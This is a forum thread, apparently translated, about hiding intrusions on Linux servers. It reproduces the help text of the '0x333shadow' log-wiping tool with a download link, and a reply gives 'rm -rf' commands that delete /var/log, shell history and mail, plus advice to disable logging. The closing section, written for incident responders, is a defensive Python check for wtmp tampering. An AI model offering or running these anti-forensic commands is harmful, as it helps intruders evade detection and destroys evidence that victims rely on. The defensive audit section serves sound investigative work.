wtfid

Clean Logs

Especially for the kids who get in from their "home RDS" connection with root:123456


[~] 0x333shadow => hide your tracks version 0.1
[~] coded by nsn of outsiders ~ 0x333 Security Labs www.0x333.org [~]

Usage: ./0 [action] -i [string] -l [secs] -m [ dir1/file1 ] [ dir2/file2 ] [ ... ]

where action have to be:


-a clean all default dirs (recursive scan) you can use even -m. (include option -s, -.
-b clean only binary (utmp, wtmp, utmpx, wtmpx, lastlog) files.


other options:

-l clean after n secs, any system can log to logout, so you exit, and it try will clean (bg mode).
-m specify more dirs or text files (if you don't specify -a, -b, -s, default dirs and logs will be skipped ...
so only dirs/files specified will be cleaned).
-i string by search, choose it with sense
-s enable research other logs watching in syslogd newsyslog confs.
-h show this help.

other auto actions: read the DOCUMENTATION.
this tool watch in these directory by default:

/var/log
/var/adm
/usr/adm
/var/mail

correct use various example:

./0 -a -i string
./0 -b -i string -s
./0 -b -i string
./0 -a -i string -l 60
./0 -i string -m /var/log/messages

USE: ./0 -a -i IP

http://ulla.no/w/0


If you had really wanted to find out how to erase your tracks on a system you got into, it is/was enough to have used Google.

rm -rf /var/log/*.*

rm -rf /.bash.history

rm -rf /var/mail/*.*

That's for a start. It would be useful to also look up how you can disable any kind of logging. There are N pages about this; you don't need a special script to do it for you.

If nothing I wrote above makes sense to you, we have a problem.

Fuck yea! Go berserk! Delete that shit... and some "kids" still wonder how they got caught!

No offense, but they need to be made to study, because they can't tell the difference between Debian, Fedora, Ubuntu, CentOS, openSUSE, Arch, etc.

For those who don't know what a posted script does and ask questions each dumber than the last... do your research before opening your mouth!

They don't even know how to run a cat on the SSH scanner they use to see that the roots it catches get mailed to someone else, and yet the nerve is in full bloom!

Learn, brothers, how to write scripts yourselves and you won't need instructions on how to use other people's!
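
For responders reading this thread: the binary files named under the tool's -b option (utmp, wtmp) are arrays of fixed-size records, so edits to them can leave structural traces. The following is an added example, not code from the thread or from the tool: a Python check over raw wtmp bytes that assumes the Linux glibc x86_64 384-byte record layout. The function names and the sample data are constructed for illustration, and the findings are triage indicators, not proof of tampering.

```python
import struct

# Assumption: Linux glibc x86_64 `struct utmp` layout, 384 bytes per record.
# Fields: type, pid, line, id, user, host, exit(2), session, tv_sec, tv_usec, addr(4).
REC = struct.Struct("<h2xi32s4s32s256shhiii4i20x")
USER_PROCESS, DEAD_PROCESS = 7, 8  # ut_type values from <utmp.h>

def cstr(b):
    """Decode a NUL-padded fixed-width field."""
    return b.split(b"\0", 1)[0].decode("utf-8", "replace")

def audit_wtmp(data):
    """Return [(record_index, finding)] for structural anomalies in raw wtmp bytes."""
    findings = []
    whole, rest = divmod(len(data), REC.size)
    if rest:  # file length is not a multiple of the record size
        findings.append((whole, "trailing partial record (%d bytes)" % rest))
    open_lines = set()  # terminal lines with a login seen and no logout yet
    for i in range(whole):
        raw = data[i * REC.size:(i + 1) * REC.size]
        if not any(raw):  # a record slot that was blanked out
            findings.append((i, "all-zero record"))
            continue
        fields = REC.unpack(raw)
        ut_type, line = fields[0], cstr(fields[2])
        if ut_type == USER_PROCESS:
            open_lines.add(line)
        elif ut_type == DEAD_PROCESS:
            # Heuristic: a pts logout whose login is missing. Log rotation can
            # also cause this near the start of a file, so triage by position.
            if line.startswith("pts/") and line not in open_lines:
                findings.append((i, "logout on %s with no login record" % line))
            open_lines.discard(line)
    return findings

def make_record(ut_type, line, user="", host="", ts=0):
    """Build one constructed record for the sample below."""
    return REC.pack(ut_type, 1000, line.encode(), b"", user.encode(),
                    host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)

# Constructed sample: a login, a blanked slot, its logout, an orphan logout, junk tail.
SAMPLE = (make_record(USER_PROCESS, "pts/0", "alice", "192.0.2.10", 1700000000)
          + bytes(REC.size)
          + make_record(DEAD_PROCESS, "pts/0", ts=1700000600)
          + make_record(DEAD_PROCESS, "pts/1", ts=1700000700)
          + b"\0" * 10)

if __name__ == "__main__":
    for index, finding in audit_wtmp(SAMPLE):
        print(index, finding)
```

On a live host, compare any findings against independent evidence such as remotely forwarded syslog or auth logs, since local files are exactly what an intruder with root can alter.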
